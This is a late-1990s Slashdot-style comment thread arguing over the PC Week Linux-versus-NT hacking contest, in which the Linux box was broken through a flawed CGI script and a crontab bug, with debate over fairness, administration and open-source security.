The only fair targets are the securelinux.hackpcweek.com, and securent.hackpcweek.com sites. To win the 1000 gift certificate you must mark up the home page or steal a file called top secret. Denial of Service attacks spoil it for everyone, and get nothing accomplished.



That's it. If that's all they have for official rules, then this guy should get the cash. While s/he (so as not to offend all those female crackers :) didn't exploit an OS-specific hole, the rules didn't say s/he had to, so it looks like PCWeek is out a grand on the deal. Oh well.

Looks to me like next time they need to include some fine print like every other contest does :)

-mike kania

PHEAR! Let's examine the facts, first

Before everyone starts flaming PC Week about how they don't know how to admin UNIX, etc. Everyone's pretty quick to jump on the wagon when an NT box is hacked, regardless of the NT admin's ability.

Re:PHEAR! Let's examine the facts, first

[JohnG]

Trying not to sound like the Linux Advocates everyone seems to hate let me just say if you want to look at the REAL facts then you have to look at REAL life. You have to look at the number of attempts on each box and the level of skill of the administrators. More importantly to solve the NT is insecure argument talk to someone who works with it. I know a guy that works on our county machines which are NT and he could tell me exactly how to get into it through various holes. Or watch ZDTV once in a while. MS has been hacked something like 8 times in two months. Hotmail twice I know. All these computers were administered by MS. Look at all the complaints about hotmails lack of speed and security since the switch to NT. Security isn't the only aspect of a good Web Serving OS. You have to look at Stability, Speed, etc. In real life their won't be thousands of hackers going after the average site. There will however be thousands of users who expect good service. Speaking of which did anybody here go to the hackpcweek site when slashdot first announced it. For me at least the NT box took three or four times as long to load as the Linux box. Looks like Linux is more suited to handle the Slashdot effect to me.

Re:PHEAR! Let's examine the facts, first

Well, could it be because every time one of these "tests" shows up, they seem to have all the help from Redmond they need to set up a "secure" NT box but usually don't make too much of an attempt to get help setting up the linux box.

No one here is claiming that linux is "easy" to set-up securely. You definately have to know what you are doing (obviously pcweek did not). But MS seems to want everyone to believe that with Windows, even a monkey could do it, but yet it always seems to take a bunch of help from MS itself to get these things working properly. If they weren't such hippocrates, we might not be so tempted to call their bluff.

Re:PHEAR! Let's examine the facts, first

[cernnunous]

Linux is not that easy to setup securely. And obviously, looking at the LONG list of non-standard changes made to the NT box, neither is NT.

The point of this test is moot, since really neither OS was compromised. It was a flawed CGI script, just like the one that brought down Hotmail.

Like many others have said already. Pay up to the guy that got in. Then fix the flawed CGI (or release the source so that somebody who's competant can), and run it again. Once all the bugs are gone from the "add-ons" on both servers, then maybe we'll begin to see which is the more secure and stable OS.

I admin both NT and Linux boxes at work. I know which of the two I can rely on to stay running and keep unwanteds out. I don't think it makes me a "Linux Zealot", perhaps it just means I find Linux easier and more intuitive to admin. If somebody else finds NT to be more stable and secure for them, more power to them.

john

Re:PHEAR! Let's examine the facts, first

[Hiro_Protaganist]

If they weren't such hippocrates

First that I have seen about MS claiming ownership of medical ethics... KEEP BILL GATES OUT OF MY HMO!!!

HA

I can already hear the MS marketing department giggling with girlish joy. "Linux was hacked but 2 NT sites stayed up (win2ktest.com and the Pcweek site)"

Sometimes it's just too easy...

Re:Test BOGUS. Linux is UNHACKABLE. PERIOD.

[Captain+Spam]

Wow, authentic second-guessing, right there.

That typically leads to third-, fourth-, and fifth-guessing. Man, that takes me back a while... it's been a while since I've seen some of that.

And I'm thankful for that. Don't feed the trolls.

------------

Re:[offtopic] comment

Your comment should read: // The floggings will continue until morale improves. Trust me, I know. My WOrld History (H) teacher has it posted in his wall!

Fair fight

[jafac]

In the immortal words of Grimjack:

"I only believe in a fair fight when I can't rig it in my favor."



"The number of suckers born each minute doubles every 18 months."

Re:CGI Script Security

[sreilly]

You obviously didn't read the description of the hack or you would know that the web server wasn't running as root - it was running as nobody. He
got root by exploiting a bug in crontab that allowed user nobody to get root access. Granted, he shouldn't have been had permission to overwrite the other CGI script in order to get a shell, but the crontab is what allowed him to eventually get root.

And to those who claim that the reason he got in was because it was a closed-source CGI script - give me a break! The cracker had the source to the script, otherwise he wouldn't have gotten in. Don't be so naive as to believe that all open-source cgi scripts are secure.

cute

[jabbo]

but just more worthless speculation.

"Absurdly complex" appears to be quantifiable when one OS has something like 20 million lines of code and the other something on the order of 2 million.

One advantage Linux has is that it is relatively easy for a competent user to configure it the way he/she wants to. This appears to be much more difficult under NT. The "lots of little tools" philosophy isn't there -- a complex aggregate which cannot be broken down into simpler pieces is harder to understand and analyze than one that can.

In any event, anything worth doing is usually pretty tough. There's no competitive advantage in offering a service Just Like Everyone Else's, and doing easy, fully understood things isn't much fun. This goes far beyond OSes and webservers.

/Life/ is absurdly complex. Get used to it.

The point

[fnj]

Everyone so far has missed the point. This isn't (or shouldn't be) a one time thing. Both servers should be left there forever, subject to ongoing attacks. No need to pay anyone anything (maybe a T shirt or something). I think there'll be plenty of entrants without any big reward being needed.

NT gets better, Linux gets better. I don't have any axe to grind, and this outcome would please me. Better operating systems; who can be against that?

Re:Sounds like a valid result to me

[magpie]

Well in responce from a person who uses NT due to my work & linux by choice

The comment about the whole system has an obvous flaw, both linux & NT can be increadible easy to crack if the CGI scripts are bad or you run bad services/deamons this leads me onto my next point. Since the MS system forces XYZ try settings then if there is a slight flaw in the set up then it is repeated in all servers. The linux view "of here's the system" means that there is a very good chance that one hole will not appear in all servers.

This brings me to the simple fact that if you employ people who can't secure a server and have to realy on the software to do it for them (automattically), then you don't valure your security, simply because no two configs are the same and no two requierments are the same.

What it boils down to is linux/unix/*BSD is as secure as you want (at the cost of additional services and the requierment for better IT staff) NT tends to be as secure as MS believes it should be. It's a simple choice. Though the fact is a badly set up linux box is easier to crach than a standard NT box, but a well set up linux/unix/*bsd box is more secure. It depends how much security matters to you.

(forgive the spelling (there's no cure for dsylexia, thank god(s)))

CGI Script Security

This test was a farce to begin with ...

If the web server is running as nobody, then shouldn't the CGI script be running as nobody too? No competent web server admin would allow the root docs directory to have 666 permissions or run the web server as root. Was this CGI script 4755, or was the directory set up with bad permissioning?

I could see exploiting a CGI script to get it to email you a sensitive file or display sensitive information, but they must have had the web server misconfigured to make it that easy to change a page in the doc root.

Re:CGI Script Security

[stoend]

if the CGI script was owned by nobody than it is logical the webpage was also owned by nobody and possible had the permissions 4600, therefore, the CGI script had possible write access to the webpage.

What if IIS had the hole?

[|DaBuzz|]

If someone had broken into NT via IIS would we still be saying "it's not the OS's fault"? I doubt it.

What I would like to know is, did the CGI ship with the RH distro they used ... if so, that's part of the OS in my book just as IIS shipping with NT is part of the OS when used in that fashion.

Re:What if IIS had the hole?

[Hall]

What I would like to know is, did

the CGI ship with the RH distro they

used ... if so, that's part of the OS

It's not likely that RedHat includes it. As has been mentioned, it's a closed-source program and RedHat has stopped including any and all closed-source or commercial programs with their distribution.

Re:What if IIS had the hole?

No we would not be saying "it's not the OS's fault" if IIS had been cracked. Isn't IIS part of the OS (at least according to microsoft)? That's part of their whole integration deal right? Make everything part of the OS. They did it with IE.

Re:What if IIS had the hole?

[witz]

IIS is not "part" of the OS. It's an installable option, just like Apache with RH 6. You can also download it seperately.

Re:What if IIS had the hole?

[zifnab]

Does-it run on anything else than Windows NT ? Apache has really no relation with RH because it doesn't rely upon it. It even works on Windows.
--

Jfs Reply to me saying it wasn't the OS fault

[MarNuke]

If the guy that hacked it says it was becuase of the OS but becuase of the GCI scripts I would think about it and might believe it. But coming from the person that hacked it saying IT WASN'T a os problem but some third party CGI script with a neon sign pointing and flash "HEY HERE'S THE DOOR, make yourself at home" I would think it was a PR stunt put on by mircosoft.

A zen troll. Now I've seen everything.

Of course, getting to define 'competent user' is the fun part. "Why, when I was your age, I had to trudge 30 miles in the snow to run VMS...but I was *thankful*!" Some days, this place seems as intellectually recursive as the SCA.

wrong

[MarNuke]

It doesn't matter was os you use, NT, Windows 95, OS/2, AIX, Solaris, Linux, FreeBSD, WHAT EVER!!! IF you run a gci script with a massive hole in it you will get hacked. It's just that simply.

Hehe, nice skewed contest

It's obvious, isn't it? "Linux is less secure than NT." I mean, the Linux box was compromised before the NT box, never mind that work was done to secure the NT box and none was done to secure the Linux box... Another great publicity stunt by ZDLabs. Surprise, surprise.

That was expected

[Enoch+Root]

I wish crackers had been a bit more brilliant in realising this was obviously a rigged contest. They should have left the Linux box alone and concentrate on NT. I'm surprised it wasn't done, given that, if I had the choice between cracking Linux or NT, I'd go for NT; it's much more easier.

But no... I get $1000 is enough to step on your integrity. And so, just watch Microsoft use that as FUD.

"There is no surer way to ruin a good discussion than to contaminate it with the facts."

Re:That was expected

Actually I gotta disagree. It is far easier to hack a poor CGI script than an ASP. For $1000 why not go for the simple route: CGI flaws.

Re:That was expected

Yep.

Everyone should concentrate on hacking the NT box.

We can dress the Linux box in diapers and send it "atta boy" packets every once in awhile. Maybe even launch a DOS attack on it so nobody can get near it to hurt the little dear.

Re:Test BOGUS. Linux is UNHACKABLE. PERIOD.

[Shane]

Hmmm I can not believe that any Linux user would be so seriously blind as to make such a statement.

There for you must be a Microsoft user sent to make linux users look bad :)

Good logic huh? hehe

What the fuck?

Can you not read? The post says it's a bug in a CGI they wrote. If it was an OS test then it's their fault for not duplicating the bug in the NT server.

They shoulda read the LASG

Linux Administrator's Security Guide http://www.securityportal.com/lasg/

Re:Must Resist

[fat_mike]

All of these contests are designed for Linux to lose. Although PC Week has been expanding their coverage of Linux, what is PC Week? It is a magazine oriented towards Windows users. Look through their ads. 99% of their ad revenue are for products for Windows.

The way I see it, there is no real way to test the two operating systems against each other. Somebody will always find something wrong with the test criteria, someone else will scream conspiracy and the whole thing starts over again. Who cares if Linux got hacked first. It doesn't matter. I use Linux because I enjoy it, not because it is "hack-proof". I find it easier to get the things done that I do.

There is no such thing as a 100% secure server. Somebody is always going to find a way to get in. These tests are designed to convince corporate big shots to use one or the other. Its going to come down to CIOs actually listening to what their Sys Admins real world tests showed for their business, not somebody elses. Your business and systems are completely different than mine. I'm not going to use NT or Linux just because it works for you.

This is not intended as flamebait. I'm just tired of this. It's like all of the sudden Linux and NT need to be on the cover of Consumer Products magazine or something.

My name is Matt and I'm a Linuxholic

That's it!

All right that's the final straw! I'm switching back to NT right now!

What's notable is what's lacking on the site

[emag]

Try going to the server configs page at www.hackpcweek.com. Note that there are configs solely for securent, none at all for securelinux. Far be it from me to be paranoid, but this lack of information leads me to suspect that the configuration of the linux server was far from optimal (even if it was hacked via a faulty closed-source CGI script). After all, if the linux box had been secured, the maintainers would know which config files had been modified, what patches needed to be applied, etc. Instead we get "reinforcement" of how "well-documented" everything in NT is, and how "poorly documented" linux is.

Also, if anyone happened to nmap the two boxen, they probably found the same thing I did...both are behind a firewall and return *identical* scans (aside from hostname):


Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on securelinux.hackpcweek.com (208.184.64.170):
Port State Protocol Service
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
70 open tcp gopher
80 open tcp http
119 open tcp nntp
139 open tcp netbios-ssn
420 filtered tcp smpte
443 open tcp https
1080 filtered tcp socks
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
Remote operating system guess: AXCENT Raptor Firewall running on Windows NT 4.0/SP3
Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds



What's this? These machines are so secure that they need to be protected by a firewall? Why? Are there possibly ports on one of them that can't be disabled any other way? This is mere speculation, but if you're running a contest to show the security of a specific box, do you add external security on top of it?

Re:What's notable is what's lacking on the site

[seoman70]

On their site they said they wanted to test under real-life conditions. In most corporate situations, this means a firewall.

As to whether I think that's fair or not is another matter.

Re:What's notable is what's lacking on the site

[kevlar]

They're behind firewalls specificly so that they can limit the attack to httpd. This leads me to assume that they aren't trying to have a "most secure os" contest, but rather they want to figure out where the hole is in NT IIS, because we all know there's a really big one. No one will give away the secret though.

Too many variables - Yes and No

[DiningPhilosopher]

Well, assuming they could find two equally knowledgable sysadmins (each relative to his/her platform - yes, this is difficult) and assuming each was allowed to choose the server, scripts, etc. to be used on that platform it's a worthwhile test. It doesn't have to be the same software to be valid.

If you had a flawless operating system but the only applications available for it were crap you would have a bad server platform. In other words, there's a difference between testing an OS and testing a platform.

(Note: I'm not arguing that the case I described is the case with the linux box in the contest - linux is not flawless and apache is not crap. I know it was a bad script and this reflects badly on almost nothing else. I'm just making a point about the hypothetical validity of this kind of testing)

Re:Too many variables - Yes and No

[David+Gould]

Right. The different toolsets available for the respective systems should be considered in rating them. That is, if a program exists for one and not the other, and it is better than the nearest equivalent on the other system, then that should be counted as a "point" in favor of that system.

I put "point" in quotes because it should not actually be counted directly, as in a checklist. Instead, the best tool should be used on each system in performing the test, and whatever advantage it gives will automatically reflect well on that system.

Rather than requiring both systems to use the same software, the testers should spend similar amounts of effort and expertise looking at the tools available for each system and selecting the best they can find.

David Gould

Sour Grapes - linux lost

Your just pissed that linux lost.

Whenever an NT test from any lab comes up with bad results, no one challenges them.

When linux (the most insecure out of the box OS around) gives a bad result, you all scream like scorched cats.

I'm not a MS employee or an NT user, but I can tell you that my experience with Red Hat in particular is that the default install is ridiculously insecure. Red Hat is shipping hackware.

Re:Sour Grapes - linux lost

[washort]

> When linux (the most insecure out of the box OS around) gives a bad result, you all scream like scorched cats.

Which box? ;-) Debian, for example is much more secure "out of the box" than Red Hat. Linux doesn't just come in one box. :)

Re:Sour Grapes - linux lost

[Megaweapon]

my experience with Red Hat in particular is that the default install is ridiculously insecure

Then your gripe is with Redhat. Linux didn't lose, poor CGI administration lost. Linux just executed their insecure code.

Re:Sour Grapes - linux lost

[witz]

Part of this is due to the fact that MS doesn't redistribute NT on a 6 month, year or biyearly basis. Which Linux does. It's much easier to keep it current that way, don't you think? So administrators have to keep the lastest service pack CD on hand...woopty doo. Real tough.

Re:Sour Grapes - linux lost

[Cramer]

"linux" is the kernel; Redhat, Debian, Slackware, SLS (*grin*), SuSe, etc. are OSen.

NT "out of the box" (read: straight off the CD) is far more problematic than most Linux distributions "out of the box". How many service packs and/or hotfixes are required to keep NT 4.0 from walking off a cliff? [Redhat is a bad example, but I'll use it anyway.] How many updates are required to keep Redhat 4.2 from jogging into on-coming traffic? In both cases, you will need to turn a few things on or off depending on what you selected during installation. (And in the NT 4.0 case, you need to install the 70M IE4 to get it near usable -- it shipped with IE3 which cannot be used to access even Microsofts download section(s). I find that damned annoying.)

Kernel to Kernel, linux and NT are too close to call. Just look at how often kernel related defects for both systems turn up. Which is more secure? Neither. Both systems can be compromised -- it's generally easier on a linux system due to the ease of (nearly) replicating the system and the availablity of code to thumb through. (It's hard to break into a black-box.)

Givin a choice, I'll take any UNIX over Windows. I like having a command line; I hate having magic hidden behind GUI buttons; And I _like_ being able to "telnet" into my UNIX server that has no video device at all.

"I don't care if a pair of gerbals could break into it; I'm gonna use linux."

OS security?

[gklyber]

An OS is only as secure as the software run on it. These security tests don't really test the OS because the OS needs software to provide services.

In this test, Linux lost. It may have been a poor choice of software, but it lost. NT tends to implement more functionality under the main OS while Linux relies more on other programs.

The Linux OS may be very secure, but it can't do much by itself. NT tends to be more consistent as MS dictates more over functionality that Linux would rely others to provide.

Relating these tests to the OS is silly. I could run a good or bad web server on either platform.

Re:OS security?

I agree that an "OS is only as secure as the software run on it." However, it IS a test of the OS security. As much as I love Linux, the reality is that Unix in general leaves holes for daemons and the like to execute as they should.

If I can use an application (daemon or otherwise) to crack security on a system, the OS has left holes for me to do it. I've cracked ITS security.

This doesn't mean every implementation and configuration combination is really, really insecure. The kernel's security holes can be mostly plugged if you have the time and resources.

Hacking CGI is fair

[substrate]

Not only is it fair but maybe its important to note. Too many people, including security authorities within many companies, fail to recognize how rigorous you have to be to maintain security. You can apply every patch against every line of code on your system and still be insecure. What's worse is that because so many people rely on specialized tools, such as SATAN, to audit security they become trusting and complacent. They're a good first step but they shouldn't be the only step for mission critical equipment.

Suppose the white hat community is fully caught up with the black hat community, or maybe even a few steps ahead. Any standard script attacks against the infrastructure of your network will fail but there's still a glaring problem.

What about user software? Users like to run software. Some of the software interacts over the internet at large, such as games. Most of it is not designed by people overly concerned with security. People run poorly written CGI scripts. All of this provides the ability to get into whatever account the application was running from. Smart intruders will remain very quiet (dumb ones will post things like "Y3R 0WN3D") and bide their time. Eventually with enough patience and/or intelligence the sytem can be compromised further.

There's a lot of things that are secured dumbly. People are smart enough not to run web servers as root anymore. They run them as 'nobody', which is fine, but they leave 'nobody' with a valid shell which is dumb.

The only truly secure system is one that is turned off, encased in concrete and sunk in the deepest trenches in the ocean. Unfortunately that isn't terribly useful, but you can increase security by conducting 'what if' thought experiments.

Re:Hacking CGI is fair

[datarealm]

Without question hacking CGI is fair. In fact, two really big and very recent CGI blunders come to mind:

• hotmail
• network solution's dotcom mail

In neither instance were there any server breaches (that have been disclosed) but some really stupid CGI errors made the entire systems as they were intended to run wide open and completely vulnerable.

If this contest was meant to only test the OS, it should have been spelled out as such in the rules.

The NT site is just broken.

This is probably the webmaster's and not the OS's fault, but when I try to click the "site diary" or
the "site rules" I get..

"netscape is unable to locate the server www.hackpcweek.com.com"

very sloppy. should we take this test seriously if they are that sloppy about building sites?

Re:The NT site is just broken.

[laslo2]

www.hackpcweek.com.com?

don't *think* so...

Can you say "one-track mind"?

[Pike]

(Disclaimer: I like linux. I am trying to get it to work on my home box. This is not flame-bait, just devil's advocate material.)

Just lurking in all the stories about linux vs NT security challenges, and it seems like most slashdotters are incredibly one-sided in their views, driven more by a sense of rebellion than anything else.

When somebody challenges people to break into their linux box, somebody eventually does, and all kinds of excuses are offered.

When somebody challenges people to break into their NT box, the linux sneetches with stars upon thars scoff, "Us? Condescend to help Microsoft by breaking into their pitiful OS? The very idea!"

If linux is so secure and Windows anything is not:

• Why do you refuse to prove your point by actually cracking an NT box in one of these challenges? On a related note, I have heard as an excuse for Linux in response to the ZDnet trial, "A system is only as good as its administrator." This seems true, but if you really believed it, (A) you would know that you would not be helping MS by cracking NT, you would be helping only the particular person administrating that box, and (B) you would be proving your as-yet undemonstrated point that NT is at least as insecure as Linux.
• Why do I read, in every mailing list and newsgroup, posts from Linux people saying "HELP! Someone cracked my box! What do I DO??" These would seem to back up my first point.
• Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL, all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a password. If you wanted Linux to be more secure, you could try making it easier batten down the hatches.

If linux advocates want any credibility, they will have to stop giving knee-jerk, "heads-I-win tails-you-lose" excuses and begin to demonstrate their claims.

Joel Dueck

Re:Can you say "one-track mind"?

[bradipo]

Your Windows computer connected 24/7 via DSL doesn't run any services so you may leave that point out. Like you say, if you disable file and print services, you don't run any risks, but you lose the functionality for that particular moment which if you need it does you no good anyway. The same can be done with a linux box. Disable all the services and no one can get in, but therein you will have a pretty useless server. You are comparing apples and oranges here.

Re:Can you say "one-track mind"?

[dammitjim]

You're right about some people's attitudes - linux should win or lose any comparison on its merits, not because people want it to win or because they want the other platform to lose. We here at /. should take care not to let this forum degenerate into Mac vs. Windows.

Play with linux for a bit, though, and you'll see why people sometimes have trouble securing their machines. There are a ton of options available, and network security is not easy - especially when the sharks out there keep getting more creative.

After shelling out for NT, you need to spend even more money to enable network services besides file sharing, so people who don't need that software don't have it. With linux, it's all there, right after install. So, because nobody has released a distro just for newbies, most people's boxes come up running telnetd and sendmail and all the potentially weak links in a large, complex system.

In short, the strengths of linux can also become its weaknesses, and we as a user community should see what we can do to remedy that.

Re:Can you say "one-track mind"?

[El+Volio]

You're right. It serves no purpose to ignore one box. But at the same time, for both Linux and WinNT, the statement regarding the administrator holds true. What you want is to get an absolute NT security guru to configure one box, and a UNIX/Linux security guru for the other, hopefully equalizing that portion of the test.

It's more common for Linux users to notice the box has been cracked. Windows users who suffer BO and similar attacks may not realize that it was due to a network intrusion, and just chalk it up to the notorious unreliability of Windows. Additionally, the type of users who are "experimenting" with Linux are more likely to be interested in security (and doing things that could risk their machines!) than the average Windows user who just wants to surf the Web.

You should not believe that merely un-checking file&print sharing will secure a Windows machine. While the rules of the contest don't count DoS attacks (since that's not the purpose of this particular evaluation), for actual consideration that would have to be a factor. Additionally, remember that this isn't just putting a Win9x or even a WinNT-WS box on the net -- it's a web server, which comes with a whole different set of challenges. With more power comes more complexity. This is true of programming, networking, race car driving, and most things in life.

I agree with you: this should not be viewed as an "either/or" proposition, but as an ongoing process. That's the way the world works, and any test should try to reflect reality in a controlled way. IOW, control is just to take out variances by converting a variable into a constant.

Re:Can you say "one-track mind"?

[jelwell]

I think a lot of people are missing the point of open sourced security. The guy who cracked the Linux Box pointed out that the security issue was a closed-source cgi script. Everyone needs to remember that the difference that the Free Software Foundation purports between NT and Linux is that Linux - with an open sourced system security can be proven; whereas in a closed source environment security can only be hoped for.

I don't condone the way this "hack contest" was put together. But I also don't think the results should be invalidated. Someone earlier mentioned that "Us? Condescend to help Microsoft by breaking into their pitiful OS? The very idea!" - the author seems to think Linux users should all try to work collectively to hack into the NT box. Is it really that Linux users think themselves better than Microsoft? Or is it really that Linux users are overly educated in the security realms of their own world? While NT security administrators can only hope that Microsoft has protected them - without really knowing how they might be exploited - and how they might secure themselves other than just applying NT updates.

Just remember: Open source security allows the administrator to have as much control over their security as any hacker - script kiddie or otherwise. Closed Source security means that thousands of MS employees, present and past, know more about your security and it's holes then you do.
Joseph Elwell.

Re:Can you say "one-track mind"?

[Eman]

they can't simply type "w" and see who's logged in

There is a program in windows that does allow you to see who is accessing your shared files. I forgot the name of it, but it comes with windows (although I am not sure that it is installed by default).

Re:Can you say "one-track mind"?

[eries]

you're right on, but I think there's more to it than that. One of the big consequences of OSS is that it eliminates "security through obscurity." In general, we all agree that this is a Good Thing (tm) because in the long run it promotes the discovery of security holes that might otherwise lay dormant. However, this means that we are going to have to accept the fact that Linux will LOSE EVERY SINGLE CHALLENGE of this sort vs. NT. Why? because these challenges are fundamentally misguided. Finding bugs in NT is frustrating and hard, because most people don't have the source code. However, I'd much rather have lamerz trying script-based attacks on my machine than have some serious hacker able to reformat my hard drive because there has been a backdoor overrun exploit in Windows since 3.1 - that's ultimately worse, and these lame hacking contests miss the point.

That said, I think it's important that we try as best we can to write apps that make it easier and easier to prevent the 3l33t d00dz from running script attacks against vanilla linux boxes run by newbie administrators who just switched from NT.

Re:Can you say "one-track mind"?

[banky]

Maybe I am atypical. When someone hacked my box, I was lucky enough to be there and yank the power cord out of the router before they managed to do anything but add a user and start downloading a trojan-ed bash. I didn't go crying to the newsgroups, I looked at the syslog output and found out what the hole was, patched everything up, and restored everything. I triple-checked my Tripwire logs to make sure that nothing was disturbed, grabbed the backup tapes and archive CDROMs I burn every 3 months, and spent several hours without it being online. I rigorously checked, rechecked, and patched, and then put it back up. They started banging away not 30 minutes later, and have been banging on every hole that comes through BUGTRAQ and everywhere else. Now I stop all work to patch a hole (rather than doing it after hours, even if I have to tell everyone to stop what they are doing - and yes, they still complain, but i don't listen). These things may seem like a lot of trouble but then again, so was the last time I patched an NT box - which broke lots of software, I might add. Merely un-checking a box won't make you secure to anything but that attack, BTW. If you run a web server, or use ICQ, or any other host of problems, not to mention DoS attacks which aren't patched in Windows, you are open. Kindly give me your IP address and I will demonstrate. Not to mention that Linux is a "one stop shop" for network services and NT is basically shipped without too many useful services IMHO. As to why not crack the NT box, well think about it: if I logged thousands of hours living and breathing Linux, and dozens with NT, I am going to get into the Linux box. Bottom line. If I am a car thief that likes Corvettes, I am not going to steal the Mustang unless there is nothing else around to steal. And as far as helping MS: I think its a lame argument, personally. But given that they don't go to any lengths to replicate a real-world environment (NT is the most superior OS ever in Marketing Land!). Why go through all the effort to try when everything that works in the real world won't work at all? Then they proudly display their logs, show the failed attacks, and say "Look, no one could get in!".

Re:Can you say "one-track mind"?

[tgd]

Why do you refuse to prove your point by actually cracking an NT box in one of these challenges? On a related note, I have heard
as an excuse for Linux in response to the ZDnet trial, "A system is only as good as its administrator." This seems true, but if you
really believed it, (A) you would know that you would not be helping MS by cracking NT, you would be helping only the particular
person administrating that box, and (B) you would be proving your as-yet undemonstrated point that NT is at least as insecure as
Linux.

Part of the thing that people sometimes miss is the higher number of underqualified administrators administrating NT servers than Unix servers. With the meteoric rise of Linux, that's becoming less the case. These days any joe-blow can throw redhat on a machine in ten minutes and leave it at that. A few years ago it wasn't that easy.

Its also probably worth pointing out that on the net, there's more usefulness that comes to a cracker in cracking a Unix system than an NT because of its inherant multiuser ability, and the fact that many things can be easily configured through text files. That makes them a prime target for script-kiddies, both because they're easier to reconfigure in a small amount of code, and because of the fact that actually getting into the server is more useful. Therefore, there's a lot more exploit scripts it seems for Unix than for NT. I don't think that's because of any lack of security holes in NT, but rather a lack of reasons to bother hacking an NT machine beyond pointing out to the administrators that NT is a bad solution.

Why do I read, in every mailing list and newsgroup, posts from Linux people saying "HELP! Someone cracked my box! What do I
DO??" These would seem to back up my first point.

For the same reason as I said above, as well as the fact that most Windows users probably wouldn't notice the fact that they'd been cracked. They can't simply type "w" and see who's logged in, and they're more used to seeing their computer slowing down and having the drives running for god-knows-what-reason. Last time I was using a cable modem, there were several dozen machines that would've been rather easy to get into because they had their drive shared without a password. Short of deleting all the files, how would any possibly know I was in their stuff? They wouldn't. And even if I deleted any of their files, without the logging present like there is under Unix, they wouldn't be able to figure out that it was an external user that wiped the files, and not some wierd glitch in the system.

Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL,
all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a
password. If you wanted Linux to be more secure, you could try making it easier batten down the hatches.

Its more complicated because you're running a server OS. That's been discussed to death -- the fact that there aren't (yet) any good "desktop" distributions, that won't by default install all the services that aren't actually used. Linux is easy to tighten up, but you've got to know that you need to do it, and you've got to know that the desktop system you installed has as much capability as any "server". A lot of people don't know that, and don't understand what that entails.

I'm hoping to find out that Corel's distribution ends up a "client only" distribution... that'd go a long way towards making that distinction clear.

Re:Can you say "one-track mind"?

[Admiral+Burrito]

Just lurking in all the stories about linux vs NT security challenges, and it seems like most slashdotters are incredibly one-sided in their views, driven more by a sense of rebellion than anything else.

Yes, and the Micro$ofties are equally one-sided. Anyone truely impartial probably doesn't care enough one way or the other to state an opinion.

When somebody challenges people to break into their linux box, somebody eventually does, and all kinds of excuses are offered.

I think the Linux PPC box is still running unhacked.

When somebody challenges people to break into their NT box, the linux sneetches with stars upon thars scoff, "Us? Condescend to help Microsoft by breaking into their pitiful OS? The very idea!"

Agreed, that seems to me to be a cop out. I think the Unix advocates know too little about NT to actually make an attempt. I think the reverse is probably true as well, the NT advocates don't know enough about Unix, which is why they have these "hacking contests" (which seem to be mostly promoted by Windows people) to get the Unix folks to do the Unix cracking for them.

Really, I think the main reason Unix gets more attention from hackers than NT is because Unix is just more interesting to hack. There have been decades of real-world experience to understand the security issues associated with Unix. And once you're in, you actually have a rich remotely-accessable environment to play in.

NT on the other hand is a different beast. Being a closed system and relatively new, the security issues are not nearly as well understood, even by NT "experts". And everyone seems to acknowledge than NT is not as good a system to access remotely, which makes a successful crack less fruitfull.

Ultimately I think it's more a security vs. obscurity thing. People don't hack NT not because it's unhackable, but because they just don't know how to hack it, and hacking it is ultimately uninteresting compared to hacking Unix. I wouldn't depend on this obscurity to protect anything of real value though.

Why is network security so complicated in Linux as compared to Windows? My windows computer is connected 24x7 via aDSL, all I have to do is disable file/print sharing; one check box. If I enable sharing, I just have to use common sense and set a password.

Don't forget to disable your web browser and your email software. Er, wait... Why are you connected to the internet? ;*)

If you wanted Linux to be more secure, you could try making it easier batten down the hatches.

It's not that hard to disable services... Is it?

Re:Can you say "one-track mind"?

[golgotha007]

i disagree with you on your entire post. sure, people cry about their boxes being hacked, so let's re-enforce the saying, 'A system is only as good as its administrator'. these people crying are poor sysadmins.
NT doesn't have the flexibility that linux and BSD has. NT doesn't give you the ability to tweak your security as tight as you possibly can.. with NT, your only option is to completely kill the offending service if no other security options are available.
if you think your winblows machine is 'secure' by disabling the 'Share Files' box, then you're really misinformed (and then i ask myself, why am i wasting my time responding to this post in the first place?!?)

good luck!!


g o l g o t h a

Re:Can you say "one-track mind"?

[Stu_28]

Actually Joel, NT has been cracked in the real-world environment on more than one occation. In fact, in a story posted on /. about security and the internet (this is the one about the security company scanning a large portion of the to find out just how insecure the internet really is) they noted that thier own network (a security firm nonetheless) had been cracked into because of two NT machines (an employees machine at home and one of their servers at work). Further, they noted that the NT log files were of no help figuring out how the person got in to the first NT box--they still don't know how it happened!

To see what I'm talking about go here htt p://www.securityfocus.com/templates/forum_message. html?forum=2&head=32&id=32 and scroll down to the section with the header of "Third week" and read it for yourself.

Re:Can you say "one-track mind"?

[Hard_Code]

netwatch

it is copied over but not made known by putting it in the start menu.

I think this is only for w9x. NT has how other set of utilities.

Re:Can you say "one-track mind"?

[blakestah]

This was a marketing stunt.

It says next to nothing about security
of linux or NT except that if you set up
your machine like a complete total moron
you are likely to get cracked.

The funniest thing about this stunt is that
PCWeek has just badly eroded its credibility.

Re:Can you say "one-track mind"?

Just remember: Open source security only allows the administrator to have as much control over their security as any hacker. And, of course, requires the administrator to follow numerous newsgroups, apply patches, etc. etc.

Job security for numerous vocal Slashdot participants, who certainly don't want more legal protection to cut into their nestegg. Viva online liberty, etc.

In theory, yes, in ego, no!

[nano-second]

Well, yes, you're right. perfectly. That should be the point. Better operating systems... of course. Makes a lot of sense. But (and this is the kicker)...

... That is never going to be the point. CrackThis!(tm) challenges are always going to be about ego. The ego of the cracker. The ego of the OS community. Ego. It sounds childish and silly, but that's what it is. These contests, which seem to be common lately, are not about testing the system, really. Sure that is often a nice side effect, but really, it seems that it's more a way to "prove" that such-n-such OS is better than this-n-that OS.

Sad, but true. It should be about improving the OS, but until these contests are restructured to be less inflammatory, people are going to use them as proof for their particular OS fanaticism. That's human nature and will have to be expected in such a setting.

Now, I personally don't have anything against these contests, they do have useful results. But I don't think we can ever, realistically, expect them to be purely for improving the OS in question.
---

Linux box probably a mostly default config

[Jeos]

